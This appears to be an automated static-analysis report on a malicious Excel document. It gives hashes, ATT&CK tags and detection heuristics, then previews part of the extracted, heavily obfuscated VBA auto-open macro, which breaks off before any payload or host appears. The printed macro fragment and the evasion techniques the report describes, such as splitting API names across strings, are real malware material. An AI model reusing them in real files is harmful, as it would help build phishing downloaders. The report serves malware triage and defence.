Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0cf2786f8028a35c…

MALICIOUS

Office (OLE)

Size: 86.5 KB
Created: 2018-07-26 11:41:26
Authoring application: Microsoft Excel
First seen: 2018-11-05
MD5: bd7de7c355f89b6c2169203e46a4b3ed
SHA-1: 5e27d552ca4dd667d7c2ed7f96fa8256a7a9f5b0
SHA-256: 0cf2786f8028a35c4f4bf90e5c2b0ff96f9f6529b1c7be1403450a8541a0ea51
Risk score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file contains a Workbook_Open VBA macro that is heavily obfuscated, including reassembling API names from split string literals such as 'mSxML2'. The macro runs automatically when the workbook is opened. The presence of CreateObject together with the obfuscated code strongly suggests that the macro's purpose is to download and execute a secondary payload, which is characteristic of downloader malware.

Heuristics (6)

  • VBA macros detected [medium] OLE_VBA_MACROS (4 related findings)
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Workbook_Open macro [high] OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 26342 bytes
SHA-256: d808ac452bbcbd7802a8a0efd9901a7f077f4d57a7b540c435c31e15c21f6f3b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
vlGYuI__UmfdJ43_e.Tef586rM4PKESSABWCGx
Dim r8IxGBDqRLB6ly16lk1_
While "L4KtlQv7JnmrwuUUqv61A4pMOccb_XuKGzdD7DdsPtFhWMyCdi5x4G6QL7d" = "HwS1v2aj7PQWlPKjPvGzBmZ8dc7P93Kz9hU57"
Dim To6m2vLKQfrgoe_FbdVUUR5JjCDZWD5OlXaa3XunuRJYhZMpu2E As Currency
Wend
Dim zhkeBtuBxquwMja5
While "ODlMCsriBFdkIyVne7_qA2XqGU769e6xFe7lGmBFzAb" = "NH18SFPPes4Wn5_qvujfIpdn2te148z9Yba8d8k2NoRVki7KhTSDY6t"
Dim hmLEijXVg347JcELwIrQdVGBRvRRhmvhbr2SP2AQyRtcpkuraG As Currency
Wend
Dim f3qnNJeIwwP_w3F
While "Tcbjv55HZaKknUq_j1YF21xbqxE_M_td1" = "VTFRFoLjtPKCh1x_voLVvMco937yz4YqptP_iqbKLfFjlXG6Q9aTfGDGzaR"
Dim MqVtyzdVxiwd_LAHOE3BjuAfzb_JgoHIGWNdyuPsFBSUccUFd8 As Currency
Wend
Dim xA6Xrboz3VuRxGZmUp8fRcyI4g
While "anCVE7ohzFLsovx9247xLJ5zFoH8oTKvcJ__" = "weOxmNPRZlAKqRj4LESOsKOZwq3e5YOduwKVnHJ84kYdn7OU"
Dim tQiVztPjOx_5UuW_UeZ4EMNC5UTFvtuyZfumz3m_fkEyGNlHMYH As Currency
Wend
Dim GfUOeBeZdXHxeBIdx_s
While "Ha2YVdFX5psK3UkmRDPNjTaHjVwjv7twGcOpOE8tX" = "ljtuKOa3X1YfuHx9rx_qfl765CXE4WK_e"
Dim z7sqWWFTpW_SOVTapfP8C1_lxyGzU9AoS_5JDQTZ2UyM2knpDmLz4Fb As Currency
Wend
Dim F3gNO9qUY9NaHVXKz_pAutKJavquJtLg6M6Wv
While "JkVG2akXM5PxmCAu6JVpVwcP5Jnvqe4Y_YocS23QjuM1Z7fqK" = "u9BiqYVF_Kpvyqr_zwMVfZCQ_Ejilz8m7j5e2zR9QUNpKdtDd"
Dim iIRSnS5tdjxwdMMCxNvKG9cM_JKV_iTfDuOxSm5jiFUrJc1_aHpePQsjo_N As Currency
Wend

Dim bGgo4NPsr8XrJRJk_mt
While "CjSJ452yNuBoGNXbaBaZb3tHBBZdLEor65BmH6" = "lsBYB7oQPbvyrihLQHyJG2cWkH_SsLLtRdXqXC1vbtu8"
Dim rVVEHsm2x8xtOmx22UhDNAfLJ1wMQCqWEenMu9I9iS6SpmatN84FKqr As Currency
Wend
Dim qzH4Q5XjuPYns9iE2Jhd4
While "DKfgXB9SGjKXv7WlD1CIsJCP9qun1A5lKwlmlV22YOloMN6AKcwSeS" = "I3HNgqPSaEohK9Ts9q8ItcgWCstsbVMjF2lrcVxJk_xf9"
Dim nB7padETThpTuKx6g1_2DaRUkOk3whonAWWpwBA2GOuS5WrJ_MDMsn4K As Currency
Wend
Dim rj_K2Lgv3BRVwFGdyKtxp9Z
While "LfZ2hdZ5VbK7L6x94r9Y3DTV2_hWf3_esI1nZS8PaE64kI5g_KyEpifHJ" = "D_b6BWbVpMC_Hgjsq7vGZtrI_VTD9xHlrcVRdTXqbf552bzmMU8ksAtRQ"
Dim R5oCXW1DYVoJQNVg_n3yvPfepzlyg2psDAKXsmDHDzaEJb6FkCnVzcd As Currency
Wend
Dim AXHVgtAfgo6EOB7xZjtu6xYTL3dM
While "dLS2jfI_jPeWBS4YMUo_nNLu_qgK8wHnOwBSUDes26LIDVr" = "k49F1LYhO_gv287AvF1FNQiDIy6LqACqr96Q8pQZyMvSwPmt44Y"
Dim BLNcSS56APLzM6yD2BoCEyYQ_eOO3JJQvjAdcek7CsOIlWgV8KurM1SKv7b As Currency
Wend
Dim wCnCz_4Cl5TjVYq_UiOnl7
While "QpYbC5PxqeBw3WpX_qS4alkWRf17leQzzJVUYlzGTFlDSkwknIJ6RCZo_" = "AHfCSJJMK7rAT9a1JhT9fDprNQaTTfwtqOWbRDA5azGm_jSJr_Fc"
Dim Eog7axxAsz2nI8SDj9gFgXgp6Bln8OlOYRmAqZ_dO_Jk7bcEPNjsg9 As Currency
Wend
Dim pG1AXJHCbMlMzSRVH8B1fM6rbh
While "fWso2qYV72zYjRE7qVTMlv82ZtdGXbKGgzn" = "uSwT4xcUYesVstiehWN6tYzMFKQ7dpq1tmTl4BZYGYgUpWuV"
Dim x6mtQ34UbhLqfe1sw1k_Y6je7ywS1dgsZ4HgB7izs8ITyr3lhxgxuo71UF As Currency
Wend
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "vlGYuI__UmfdJ43_e"
Dim mWr8d3BkFCeZhyUZoDtnpvA2lKnLnFtmv3G_y75zGTS6scCdWfxaValzVzUQMx6_Q1mnpTjrG3fTa_GGHIyGRRPTOPm9kllRXSn2yWwC5_Rb5PWPqLHD9wq8jRWXpjFePL6GZORtVuLL_wX83V As String
Dim g5xKXl8j6IbUJCTHMs5wRsdUcvavXlnK8OhXDLF9yYTnyJ4bhpQVzKnwYbrlIJJSePW5d6_Ak682XzfQ29MrSPTvjt9kddxmN_Ggw87kjPu4MuXh5YsI7a9N5kSs7ceFFS As String
Dim hf4xZ_Qdeo_EupK_L7i6Tvn4f6NK7aZJFcjhyTCKAz5kIGT_S_EheHEu2_QdtEgCM49QElI2 As Integer
Dim ASUvBfZwwJENrtvuBPOhUPuftKl5yfYeKe3z1ceg3XJ3jn4SXiATFSCshyBy3d7PtiCKz54htro7 As String

 Function wbEic7AcPkVRpzQtUZvOpM5JuC6r8u6PK4HEtHcLSUZPONFqf_Re__Z(JiEiNdBO4wryLFYwiTN9o5JxddY1yyYvagyPbaDob9TyIpP79ZDq35zOWQDtDJY_V5WoPHSGPheoiTmxLb1Xtr2epi2IVRjQhNbMQkozF5ZTYIoBmOfjSASmB28qOIu78MES2Yfkw_QxQgEe4zfEu)
Dim Gqckj1CAOubz8sEaFmryrNtKMt2w
While "aM61uVVBdJIETz8ZFyo2YXVaF
... (truncated)